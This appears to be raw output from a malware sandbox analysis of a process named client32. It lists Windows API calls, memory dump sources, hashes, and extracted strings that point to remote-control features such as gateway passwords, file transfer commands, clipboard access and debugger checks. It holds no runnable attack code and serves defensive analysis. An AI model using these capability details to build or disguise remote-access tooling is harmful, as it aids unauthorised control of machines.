                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Resource$CreateDialogIndirectParam_calloc_free$ErrorFindLastLoadLock_memsetwsprintf
                                                                                                                        • String ID: $CLTCONN.CPP$DoUserLogin$Get login name. Check if logged in$GetName$Login name %s$Not logged in!$u
                                                                                                                        • API String ID: 3626227667-1552251038
                                                                                                                        • Opcode ID: 01fd35b3c109e338554ba1db0897715522d16d727ac1624b289d742af69260c7
                                                                                                                        • Instruction ID: 25b904e35b270628fa9a38861c68e686706e0c30f1396ea4e15f3982f5bea4d1
                                                                                                                        • Opcode Fuzzy Hash: 01fd35b3c109e338554ba1db0897715522d16d727ac1624b289d742af69260c7
                                                                                                                        • Instruction Fuzzy Hash: 97612674E41A1AEFD710DFA4CCC1FADF3A5AB8470DF104269EA265B2C0EB716940C792
                                                                                                                        APIs
                                                                                                                        • SetWindowLongA.USER32(?,000000FC,?), ref: 1115B1C6
                                                                                                                        • RemovePropA.USER32(?), ref: 1115B1E5
                                                                                                                        • RemovePropA.USER32(?), ref: 1115B1F4
                                                                                                                        • RemovePropA.USER32(?,00000000), ref: 1115B203
                                                                                                                          • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
                                                                                                                          • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
                                                                                                                          • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
                                                                                                                          • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
                                                                                                                        • CallWindowProcA.USER32(?,?,?,?,?), ref: 1115B55A
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: PropRemove$Window$CallErrorExitLastLongMessageProcProcesswsprintf
                                                                                                                        • String ID: ..\ctl32\wndclass.cpp$old_wndproc
                                                                                                                        • API String ID: 1777853711-3305400014
                                                                                                                        • Opcode ID: c3063e6233cfac457fb0abdd6f1d250989d48feedc8840d264afa341f117270a
                                                                                                                        • Instruction ID: ee076e1b1c12c59e2fd2c34d2ca2faed304bf4b043a58102cf48aae30fabbc62
                                                                                                                        • Opcode Fuzzy Hash: c3063e6233cfac457fb0abdd6f1d250989d48feedc8840d264afa341f117270a
                                                                                                                        • Instruction Fuzzy Hash: 43C17BB53041199FD748CE69E890E7FB3EAFBC8311B10466EF956C7781DA21AC118BB1
                                                                                                                        APIs
                                                                                                                        • OpenClipboard.USER32(?), ref: 1101F387
                                                                                                                        • GlobalAlloc.KERNEL32(00002002,00000002), ref: 1101F397
                                                                                                                        • GlobalLock.KERNEL32(00000000), ref: 1101F3A0
                                                                                                                        • _memmove.LIBCMT ref: 1101F3A9
                                                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 1101F3B2
                                                                                                                        • EmptyClipboard.USER32 ref: 1101F3B8
                                                                                                                        • SetClipboardData.USER32(00000001,00000000), ref: 1101F3C1
                                                                                                                        • GlobalFree.KERNEL32(00000000), ref: 1101F3CC
                                                                                                                        • MessageBeep.USER32(00000030), ref: 1101F3D4
                                                                                                                        • CloseClipboard.USER32 ref: 1101F3DA
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ClipboardGlobal$AllocBeepCloseDataEmptyFreeLockMessageOpenUnlock_memmove
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3255624709-0
                                                                                                                        • Opcode ID: e34d2ed037c0cc0ce93fd965415a0307a16a5f75420eb2469a8d43960e23cf46
                                                                                                                        • Instruction ID: a74b028ba7232528d54cbd7924e13de8c44cceb4ce50299c474c183637a6b5bc
                                                                                                                        • Opcode Fuzzy Hash: e34d2ed037c0cc0ce93fd965415a0307a16a5f75420eb2469a8d43960e23cf46
                                                                                                                        • Instruction Fuzzy Hash: 67019276A012636BD3026B748CCCE5FBBACDF55349704C079F626C6109EB74C8058762
                                                                                                                        APIs
                                                                                                                        • IsDebuggerPresent.KERNEL32 ref: 685B8BA8
                                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 685B8BBD
                                                                                                                        • UnhandledExceptionFilter.KERNEL32(685D427C), ref: 685B8BC8
                                                                                                                        • GetCurrentProcess.KERNEL32(C0000409), ref: 685B8BE4
                                                                                                                        • TerminateProcess.KERNEL32(00000000), ref: 685B8BEB
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_68590000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                        • String ID: d+Yh
                                                                                                                        • API String ID: 2579439406-2299009342
                                                                                                                        • Opcode ID: da225835752c447bfac5130adb1a18d82d3ac8a79ef07ff9ebfaef77dd60aca0
                                                                                                                        • Instruction ID: 5b7a44b04b108a12c82899201127595078470077ed4cc399642a983bf8f4aaf3
                                                                                                                        • Opcode Fuzzy Hash: da225835752c447bfac5130adb1a18d82d3ac8a79ef07ff9ebfaef77dd60aca0
                                                                                                                        • Instruction Fuzzy Hash: B521BBB4850206EFCF01DF69E488ACD7BB8FB4A314F82551AEC0897380E7B499858F0D
                                                                                                                        APIs
                                                                                                                        • GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002,?,?,685C232A,?,685B7F44,?,000000BC,?), ref: 685C1D00
                                                                                                                        • GetLocaleInfoW.KERNEL32(?,20001004,?,00000002,?,?,685C232A,?,685B7F44,?,000000BC,?), ref: 685C1D29
                                                                                                                        • GetACP.KERNEL32(?,?,685C232A,?,685B7F44,?,000000BC,?), ref: 685C1D3D
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_68590000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: InfoLocale
                                                                                                                        • String ID: ACP$OCP
                                                                                                                        • API String ID: 2299586839-711371036
                                                                                                                        • Opcode ID: 391be5ff22062c71fe94a954f7c5aa84a1c6d61f7630c48c74d1631c59319b86
                                                                                                                        • Instruction ID: c4806d2fb8bd5a795361a76b1cf2bb9d6b6adad56403d54b29346d9efe38b374
                                                                                                                        • Opcode Fuzzy Hash: 391be5ff22062c71fe94a954f7c5aa84a1c6d61f7630c48c74d1631c59319b86
                                                                                                                        • Instruction Fuzzy Hash: 9B01A23554560ABEEB01DBB4DC55B9E37B8AF41369FF0849DF911E1080EB70CA41CAAA
                                                                                                                        APIs
                                                                                                                        • __time64.LIBCMT ref: 1101D213
                                                                                                                        • SetRect.USER32(?,00000000,00000000,00000000,00000000), ref: 1101D232
                                                                                                                        • GetLocalTime.KERNEL32(00000002), ref: 1101D25C
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: LocalRectTime__time64
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 394334608-0
                                                                                                                        • Opcode ID: de18328b6b15506cedc7e23451f66c7985023e4612589437c270b1aaafaaec95
                                                                                                                        • Instruction ID: 290189b485d165d605b85d0a399bd35ca550a15b876ac08f977e3d1591b43d19
                                                                                                                        • Opcode Fuzzy Hash: de18328b6b15506cedc7e23451f66c7985023e4612589437c270b1aaafaaec95
                                                                                                                        • Instruction Fuzzy Hash: 01316C75904B44DFD320CF68D944B9AFBE8EB48714F00896EE86AC7780DB34E904CB51
                                                                                                                        APIs
                                                                                                                        • GetLastError.KERNEL32(00000400,?,00000000,00000000,?,?,1105990A,DuplicateHandle), ref: 11059281
                                                                                                                        • FormatMessageA.KERNEL32(00001100,00000000,00000000,?,?,1105990A,DuplicateHandle), ref: 1105928F
                                                                                                                        • LocalFree.KERNEL32(?,?,?,1105990A,DuplicateHandle), ref: 11059299
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorFormatFreeLastLocalMessage
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1365068426-0
                                                                                                                        • Opcode ID: c4da030cc566985fed10b8ae72e49a46dab86cf533d5b385c533f073b0b7a5cb
                                                                                                                        • Instruction ID: 5b7cf9c0659eada95368eb5e30aa7fe70508538aa6eda4fa9add4fab25305eb2
                                                                                                                        • Opcode Fuzzy Hash: c4da030cc566985fed10b8ae72e49a46dab86cf533d5b385c533f073b0b7a5cb
                                                                                                                        • Instruction Fuzzy Hash: D2D05E79684308BBE2159BD0CC4AFADB7ACD70CB16F200166FB01961C0DAB169008B76
                                                                                                                        APIs
                                                                                                                        • DeviceIoControl.KERNEL32(00000000,002A400C,00000000,00000000,00000000,00000000,11030FDE,00000000), ref: 110A9260
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ControlDevice
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2352790924-0
                                                                                                                        • Opcode ID: bee1594c9b993945fc66beb885ff9e6d2c70a72c6a38e995273342c6cce042f3
                                                                                                                        • Instruction ID: e696868f72d0725410e46aa1b0c9657244e5a899ecae170b9f1eee7695916dac
                                                                                                                        • Opcode Fuzzy Hash: bee1594c9b993945fc66beb885ff9e6d2c70a72c6a38e995273342c6cce042f3
                                                                                                                        • Instruction Fuzzy Hash: D5E0CDF5A0820CBFA304DEF99CC1C6BB79CD5063687100399F629C3141E5719D109770
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_68590000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLast$_fseek$__fsopen_free_memset
                                                                                                                        • String ID: CMD=PUTFILE$DATA=$FLEN=%d$FNAME=%s$GSK=%s$Gateway_Gsk$Gateway_Operator$Gateway_Password$MORE=%d$OFFSET=%d$ON=%s$PWD=%s$SUB=%s$ctl_putfile - _filelength FAILED (error: %d)$ctl_putfile - _topen FAILED (error: %d)$ctl_putfile - empty file (%s)$putfile - _read FAILED (error: %d)
                                                                                                                        • API String ID: 908761794-2149975586
                                                                                                                        • Opcode ID: 039bff6ecf51de9fb99d87edbb5e941ea2798d97290c7d9418abb4dc27d0e6b8
                                                                                                                        • Instruction ID: 7111f359fd206deefff7ffb402162e1aaed40b04c83980efe32d8c786de002e9
                                                                                                                        • Opcode Fuzzy Hash: 039bff6ecf51de9fb99d87edbb5e941ea2798d97290c7d9418abb4dc27d0e6b8
                                                                                                                        • Instruction Fuzzy Hash: F1B18FB5C40218ABDB20DBF8CC94FEEB7B8AF94304F904159E919A7245EB315E44CBA5
                                                                                                                        APIs
                                                                                                                        • _memset.LIBCMT ref: 6859CDF0
                                                                                                                        • EnterCriticalSection.KERNEL32(685DB898,00000000,?), ref: 6859CE13
                                                                                                                        • InterlockedIncrement.KERNEL32(-685DCB16), ref: 6859CE29
                                                                                                                        • InterlockedIncrement.KERNEL32(-685DCB86), ref: 6859CE2F
                                                                                                                          • Part of subcall function 685A7D00: __vswprintf.LIBCMT ref: 685A7D26
                                                                                                                        • LeaveCriticalSection.KERNEL32(685DB898), ref: 6859CE36
                                                                                                                        • _free.LIBCMT ref: 6859CF2C
                                                                                                                        • _free.LIBCMT ref: 6859CFD7
                                                                                                                          • Part of subcall function 685B1BFD: HeapFree.KERNEL32(00000000,00000000), ref: 685B1C13
                                                                                                                          • Part of subcall function 685B1BFD: GetLastError.KERNEL32(00000000), ref: 685B1C25
                                                                                                                        • _free.LIBCMT ref: 6859D029
                                                                                                                        • _free.LIBCMT ref: 6859D0CA
                                                                                                                        • _free.LIBCMT ref: 6859D109
                                                                                                                        • _free.LIBCMT ref: 6859D115
                                                                                                                          • Part of subcall function 68595060: _free.LIBCMT ref: 6859506A
                                                                                                                          • Part of subcall function 68595060: _malloc.LIBCMT ref: 68595090
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_68590000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: _free$CriticalIncrementInterlockedSection$EnterErrorFreeHeapLastLeave__vswprintf_malloc_memset
                                                                                                                        • String ID: APPTYPE=%d$CMD=CTL_BROWSE$CONTEXT=%s$CSPEC=%s$CTLTYPE=%d$GSK$GSK=%s$Gateway_Gsk$Gateway_Name$Gateway_Password$Gateway_Username$MATCH_NAME=%s$PWD=%s$REQHOSTNAME=1$REQUSERNAME=1$SERVICETYPE=CLASS$SERVICETYPE=DEPT$USER=%s$WANTSHELP=1
                                                                                                                        • API String ID: 2543302378-3410294771
                                                                                                                        • Opcode ID: 091711460f17333c7393b79fcb44e37d989934529a393a86f32887112bb153fa
                                                                                                                        • Instruction ID: 2a16e4c8489222f0975180bf63dd6f651adaacb0976951d4aee4bcd3784d2b38
                                                                                                                        • Opcode Fuzzy Hash: 091711460f17333c7393b79fcb44e37d989934529a393a86f32887112bb153fa
                                                                                                                        • Instruction Fuzzy Hash: 39916776C40259ABDF21DBA4CC80FFEB778AB44204F8445D9E94A77141EB305E84CFA4
                                                                                                                        APIs
                                                                                                                        • LoadCursorA.USER32(00000000,00007F00), ref: 111390BA
                                                                                                                        • GetStockObject.GDI32(00000004), ref: 111390C5
                                                                                                                        • RegisterClassA.USER32(?), ref: 111390D9
                                                                                                                        • GetLastError.KERNEL32 ref: 1113914F
                                                                                                                        • GetLastError.KERNEL32 ref: 1113916B
                                                                                                                        • CreateWindowExA.USER32(00080020,NSMBlankWnd,Blank,88800000,?,?,?,?,00000000,00000000,00000000,00000000), ref: 111391D5
                                                                                                                        • SetWindowPos.USER32(?,00000001,00000000,00000000,00000000,00000000,00000053), ref: 1113923E
                                                                                                                        • SetWindowPos.USER32(?,000000FF,00000000,00000000,00000000,00000000,00000053), ref: 1113926D
                                                                                                                        • UpdateWindow.USER32(?), ref: 1113929B
                                                                                                                        • GetProcAddress.KERNEL32(?,DwmEnableComposition), ref: 111392B6
                                                                                                                        • SetTimer.USER32(?,00000081,00000014,00000000), ref: 111392FA
                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,110F55DC), ref: 11139304
                                                                                                                          • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
                                                                                                                          • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
                                                                                                                          • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
                                                                                                                          • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,110F55DC), ref: 11139322
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
